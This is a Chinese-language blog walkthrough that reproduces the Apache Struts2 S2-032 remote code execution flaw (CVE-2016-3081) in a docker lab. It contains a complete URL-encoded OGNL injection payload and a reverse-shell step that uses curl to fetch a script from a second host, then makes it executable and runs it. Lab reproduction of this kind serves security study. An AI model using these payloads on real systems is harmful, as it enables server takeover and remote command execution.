2. 程式人生 > 其它 >S2-032 遠端程式碼執行漏洞(CVE-2016-3081)

S2-032 遠端程式碼執行漏洞(CVE-2016-3081)

阿新 發佈:2022-05-18

影響版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3)

漏洞詳情:

漏洞環境

執行如下命令啟動struts2 2.3.28:

docker-compose up -d

環境啟動後,訪問http://your-ip:8080即可看到預設頁面。

漏洞復現

Struts2在開啟了動態方法呼叫(Dynamic Method Invocation)的情況下,可以使用method:<name>

的方式來呼叫名字是<name>的方法,而這個方法名將會進行OGNL表示式計算,導致遠端命令執行漏洞。

直接請求如下URL,即可執行id命令:

http://your-ip:8080/index.action?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=id

反彈Shell

通過Burp傳送的payload要經過URL編碼

GET /index.action?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=\\A&ppp=%20&encoding=UTF-8&cmd=curl%20http%3A%2F%2F192.168.10.129%3A8888%2Fshell.txt%20-o%20%2Ftmp%2Fshell.sh HTTP/1.1
Host: 192.168.10.128:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=9zs07axi06w1lnowjvmaa52o
Upgrade-Insecure-Requests: 1



 
chmod 777 /tmp/shell.sh
#URL編碼
chmod%20777%20%2Ftmp%2Fshell.sh
/bin/bash /tmp/shell.sh
#URL編碼
/bin/bash /tmp/shell.sh

成功反彈Shell

相關推薦

S2-032 遠端程式碼執行漏洞CVE-2016-3081

影響版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3) 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-032

S2-046 遠端程式碼執行漏洞CVE-2017-5638

影響版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-046

S2-057 遠端程式碼執行漏洞CVE-2018-11776

影響版本:<=Struts 2.3.34,Struts 2.5.16 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-057

WordPress 4.6遠端程式碼執行漏洞CVE-2016-10033復現環境搭建指南

首先是找到網上的漏洞分析和poc指令碼,WordPress <4.7.1 遠端程式碼執行漏洞非外掛無需認證,附Poc,演示視訊——具體關於漏洞的分析不多說了,這個說得很好了,主要是說環境搭建。

sql server 遠端訪問informix_微軟 SQL Server 遠端程式碼執行漏洞CVE-2020-0618

技術標籤:sql server 遠端訪問informix 漏洞描述 近日,微軟釋出了2月安全更新公告,其中CVE-2020-0618 SQL Server 遠端命令執行漏洞在國記憶體在危害,SQL Server 在國內使用量大。

關於Spring Cloud Gateway 遠端程式碼執行漏洞CVE-2022-22947的安全告知

Spring Cloud Gateway 是 Spring Cloud 下的一個專案,該專案是基於 Spring 5.0、Spring Boot 2.0 和 Project Reactor 等技術開發的閘道器,它旨在為微服務架構提供一種簡單有效統一的 API 路由管理方式。

漏洞通告】Apache Struts2遠端程式碼執行漏洞CVE-2021-31805

轉至:https://www.venustech.com.cn/new_type/aqtg/20220413/23713.html 0x00 漏洞概述 CVE   ID CVE-2021-31805

開源應用框架Spring Framework存在遠端程式碼執行漏洞CVE-2022-22965解決方案

監測發現,開源應用框架Spring Framework存在遠端程式碼執行漏洞(CVE-2022-22965。經分析研判,在JDKJava開發工具包9及以上版本環境中,或版本低於5.3.18和5.2.20的Spring框架及衍生框架構建的網站或應用中,

Spring Framework遠端程式碼執行漏洞CVE-2022-22965

一、漏洞描述 springframework 是spring 裡面的一個基礎開源框架,主要用於javaee的企業開發。

mongo-express 遠端程式碼執行漏洞CVE-2019-10758

mongo-express是一款mongodb的第三方Web介面,使用node和express開發。如果攻擊者可以成功登入,或者目標伺服器沒有修改預設的賬號密碼admin:pass,則可以執行任意node.js程式碼

Spring Framework 遠端命令執行漏洞CVE-2022-22965

Spring Framework 遠端命令執行漏洞 CVE-2022-22965  近日,Spring 官方 GitHub issue中提到了關於 Spring Core 的遠端命令執行漏洞,該漏洞廣泛存在於Spring 框架以及衍生的框架中。

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2019-7238

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.14.0及之前版本中,存在一處基於OrientDB自定義函式的任意JEXL表示式執行功能,而這處功能存在未授權訪問漏洞,將可以

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2020-10199

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.21.1及之前版本中,存在一處任意EL表示式注入漏洞

gitlist 0.6.0 遠端命令執行漏洞CVE-2018-1000533

gitlist是一款使用PHP開發的圖形化git倉庫檢視工具。在其0.6.0版本及以前,存在一處命令引數注入問題,可以導致遠端命令執行漏洞

GitLab 遠端命令執行漏洞CVE-2021-22205

GitLab是一款Ruby開發的Git專案管理平臺。在11.9以後的GitLab中,因為使用了圖片處理工具ExifTool而受到漏洞CVE-2021-22204的影響,攻擊者可以通過一個未授權的介面上傳一張惡意構造的圖片,進而在GitLab伺服器上執行

node-postgres 程式碼執行漏洞CVE-2017-16082

漏洞原理 node-postgres在處理型別為Row Description的postgres返回包時,將欄位名拼接到程式碼中。由於沒有進行合理轉義,導致一個特殊構造的欄位名可逃逸出程式碼單引號限制,造成程式碼執行漏洞

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2020-10204

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.21.1及之前版本中,存在一處任意EL表示式注入漏洞,這個漏洞CVE-2018-16621的繞過。

Webmin 遠端命令執行漏洞CVE-2019-15107

Webmin是一個用於管理類Unix系統的管理配置工具,具有Web頁面。在其找回密碼頁面中,存在一處無需許可權的命令注入漏洞,通過這個漏洞攻擊者即可以執行任意系統命令。

Imagetragick 命令執行漏洞CVE-2016–3714

ImageMagick是一款使用量很廣的圖片處理程式,很多廠商都呼叫了這個程式進行圖片處理,包括圖片的伸縮、切割、水印、格式轉換等等。但近來有研究者發現,當用戶傳入一個包含『畸形內容』的圖片的時候,就有可能觸發命

Struts2 S2-059 遠端程式碼執行漏洞(CVE-2019-0230)

Apache Struts框架, 會對某些特定的標籤的屬性值,比如id屬性進行二次解析,所以攻擊者可以傳遞將在呈現標籤屬性時再次解析的OGNL表示式,造成OGNL表示式注入。從而可能造成遠端執行程式碼